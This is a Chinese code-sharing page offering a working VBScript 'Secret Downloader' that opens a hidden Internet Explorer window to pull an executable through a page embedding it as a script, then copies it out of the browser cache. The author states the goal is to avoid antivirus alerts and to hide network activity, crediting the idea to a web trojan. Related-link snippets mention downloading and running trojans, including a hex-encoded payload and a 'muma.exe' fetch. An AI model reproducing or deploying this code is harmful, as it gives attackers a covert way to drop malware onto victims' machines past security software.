使用vbs下载文件的代码加强版

说到使用vbs下载文件是不是想到了XMLHTTP呢,呵呵,以下是比较经典的代码:
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

当你把这段代码保存为vbs的时候,杀毒软件可能就开始报警了;而且使用中cscript.exe会访问网络,不太隐蔽。
    那么,有没有更好的方法呢?答案很明显:-)
    我们可以利用一个叫InternetExplorer.Application的对象(其实就是个IE啦)下载文件。但是貌似这个组件不能直接下载保存文件,只好曲线救国了。因为IE是把文件下载到本地缓存的,我们可以让IE组件先把文件下载到缓存,然后再从缓存找到并copy至我们需要保存的位置。其实这个思路是从一个网马看到的:)
    为了让IE把我们的exe文件下载到本地缓存,我们需要有一个网页把exe文件包含进去。比如:<script src="520.exe"></script>。这样当IE访问该页面的时候就会把520.exe当成js脚本保存到本地缓存了。保存的命名一般是520[1].exe,IE临时文件的位置可以从注册表键值 HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory 中读取。
    好了,不废话,看代码:

'=============================
'  get.vbs 
'   by lake2
'=============================

If WScript.Arguments.Count <> 3 Then
 WScript.Echo ""
 WScript.Echo "======= The Secret Downloader 0.1 ================"
 WScript.Echo "  by lake2 "
 WScript.Echo "Usage:   CScript /nologo" & WScript.ScriptName & " [URL] [RemoteName] [LocalFile]"
 WScript.Echo "Example: CScript /nologo" & WScript.ScriptName & " http://www.0x54.org/lake.htm 520.exe c:\520.exe"
 WScript.Echo "=================================================="
 WScript.Quit
End If

URL = WScript.Arguments(0)
exeName = WScript.Arguments(1)
If InStr(exeName, ".") > 0 Then
 tmp = Left(exeName,InStrRev(exeName, ".")-1)
 tmp2 = Right(exeName,Len(exeName) - InStrRev(exeName, ".") + 1)
 FindFileName = tmp & "[1]" & tmp2
End If
LocalName = WScript.Arguments(2)

set ie=wscript.createobject("internetexplorer.application")
ie.visible = 0
ie.navigate URL

WScript.Echo "[+]Create and Exec IE to your HTTP Server ..."
WScript.Sleep(5000)
ie.quit
WScript.Echo "[+]Get the file ..."
set objshell= WScript.Createobject("WScript.Shell")
strValue = objshell.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\paths\Directory")
ShowAllFile(strValue)
WScript.Echo "[-]download Fail :("

Sub ShowAllFile(Path)
 Set FSO = CreateObject("Scripting.FileSystemObject")
 Set f = FSO.GetFolder(Path)
 Set fc = f.SubFolders
 For Each f1 in fc
  If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
   FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, LocalName
   WScript.Echo "[+]Download Success !"
   WScript.Quit
  End If
  ShowAllFile path&"\"&f1.name
     Next
 Set FSO = Nothing
End Sub

使用方法:
    1、在你的web目录放上一个htm文件,内容包含要下载的文件。如:<script src=520.exe></script>
    2、CScript get.vbs 第一步的网页URL 网页包含的文件名 本地保存路径

例子:CScript get.vbs http://www.0x54.org/lake2/get.htm whoami.exe c:\who.exe

PS:脚本使用了5秒钟作为下载文件的时间,可以改成等待下载完毕再继续的,不过基本上够用,懒得改了-_-

(0)

相关推荐

  • VBS下载文件的新方法

    BLOG备份脚本时发现 CDO.MESSAGE可以访问网络下载东西,说是研究研究或许可以用来当下载者用. 于是研究了一会.写出个粗糙的DEMO. exe2hex.vbs //xiaolu写的exe2vbs ,我修改成直接拖放,转成十六进制 ================================================ 复制代码 代码如下: 'code by xiaolu 'change by NetPatch on error resume next set arg=wscri

  • vbs 多线程下载实现代码

    话说还是闲来练手,初步实现了自己认为的"多线程"下载.(至于是不是多线程,可以参考12楼链接) 为避免冗余,省了一些错误检查.我觉得没多大实际用途,有兴趣的兄弟一起学习讨论呗.欢迎大家指正: 复制代码 代码如下: 'by wankoilz url=InputBox("输入完整下载地址:") threadCount=InputBox("输入线程数(不超过10吧,太多就累赘了):") fileName=GetFileName(url) filePat

  • 用ASP VBS xmlhttp adodbstream下载和保存图片的代码

    函数: 复制代码 代码如下: function saveFile(data,recfilen)      set Astream=CreateObject("Adodb.Stream")'asp Server.CreateObject("Adodb.Stream")      fxt=mid(recfilen,InStrRev(recfilen,".")+1)      txt=false      if fxt="asp" 

  • 一个收集的下载木马并运行的VBS代码

    <script language="VBScript">  S="2020206F6E206572726F7220726573756D65206E6578740D0A737  3733D226D64622E657865220D0A61613D226F62220D0A6161613D22  6A65220D0A616161613D226374220D0A61616161613D22636C61220  D0A6161616161613D2273736964220D0

  • 下载文件到本地运行的vbs

    复制代码 代码如下: 'on error resume next dl = http://www.jb51.net/index.htm '这是要下载的文件的路径str="Microsoft.XMLHTTP" Set x = CreateObject(str) Set x = CreateObject(str) set S = createobject("adodb.stream") S.type = 1 x.Open "GET", dl, Fal

  • VBS下载者(通过vbscript实现文件下载)

    一.VBS下载者: 复制代码 代码如下: Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.jbzj.com/muma.exe",0Post.Send()Set aGet = CreateObject("ADODB.Stream")aGet

  • 支持断点下载的VBS代码

    之前我就介绍过VBScript语言的强大.今天再给出一个支持断点下载的VBS代码. 并附上VBS代码的解析,不懂的朋友可以配合微软的SCRIPT56.CHM文档自学.很简单, VBS的好处就是代码易于理解.基本上每行代码执行功能都用英文表示出来了. 这个代码也是对我以前介绍的VBS下载功能的补充. 老规矩,复制保存为dl.vbe. 不过这个VBS的代码的不同之处不是双击运行,而是在CMD命令行下执行. 下载功能执行的格式是: cscript.exe dl.vbs (目标文件地址) [以下载Met

  • VBS 下载方法(CDO.MESSAGE)

    于是研究了一会.写出个粗糙的DEMO. exe2hex.vbs //xiaolu写的exe2vbs ,我修改成直接拖放,转成十六进制 ================================================ 复制代码 代码如下: 'code by xiaolu 'change by NetPatch on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit do whil

  • 使用vbs下载文件的代码加强版

    说到使用vbs下载文件是不是想到了XMLHTTP呢,呵呵,以下是比较经典的代码: iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "GET",iRemote,0 xPost.Send() set sGet=createObject("ADODB.Strea

  • JavaWeb中上传和下载文件实例代码

    JavaWeb中上传和下载文件实例代码

    一丶先引入上传下载的lib 二丶上传的的servlet package com.test.action; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.util.List; import javax.servlet.ServletExcepti

  • asp.net Web Services上传和下载文件(完整代码)第1/2页

    下面,我们就分别介绍如何通过Web Services从服务器下载文件到客户端和从客户端通过Web Services上载文件到服务器.一:通过Web Services显示和下载文件 我们这里建立的Web Services的名称为GetBinaryFile,提供两个公共方法:分别是GetImage()和GetImageType(),前者返回二进制文件字节数组,后者返回文件类型,其中,GetImage()方法有一个参数,用来在客户端选择要显示或下载的文件名字.这里我们所显示和下载的文件可以不在虚拟目录

  • Python实现多线程下载文件的代码实例

    实现简单的多线程下载,需要关注如下几点:1.文件的大小:可以从reponse header中提取,如"Content-Length:911"表示大小是911字节2.任务拆分:指定各个线程下载的文件的哪一块,可以通过request header中添加"Range: bytes=300-400"(表示下载300~400byte的内容),注意可以请求的文件的range是[0, size-1]字节的.3.下载文件的聚合:各个线程将自己下载的文件块保存为临时文件,所有线程都完

  • php中强制下载文件的代码(解决了IE下中文文件名乱码问题)

    中间遇到一个问题是提交的中文文件名直接放到header里在IE下会变成乱码,解决方法是将文件名先urlencode一下再放入header,如下. 复制代码 代码如下: <?php $file_name = urlencode($_REQUEST['filename']); header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, po

  • php下载文件的代码示例

    复制代码 代码如下: <?php $file = 'monkey.gif'; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Tra

  • JS下载文件|无刷新下载文件示例代码

    后台代码Handler.ashx 复制代码 代码如下: <%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; public class Handler : IHttpHandler { public void ProcessRequest (HttpContext context) { string fileName = "web.conf

  • servlet下载文件实现代码详解(五)

    本文实例为大家分享了servlet下载文件的具体代码,供大家参考,具体内容如下 1.servlet下载文件 servlet下载文件就是将服务器端的文件传输到客户端. 2案例 下载文件servlet类 package com.learn; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.serv

  • 在.NET中利用XMLHTTP下载文件的代码

    利用XMLHTTP下载文件,和以前的方法一样,先添加引用-COM-Microsoft Xml 3.0,然后在代码开始处写: using MSXML2; 下面就是主要的代码: private void Page_Load(object sender, System.EventArgs e){  string Url = "http://dotnet.aspx.cc/Images/logoSite.gif";  string StringFileName = Url.Substring(U

随机推荐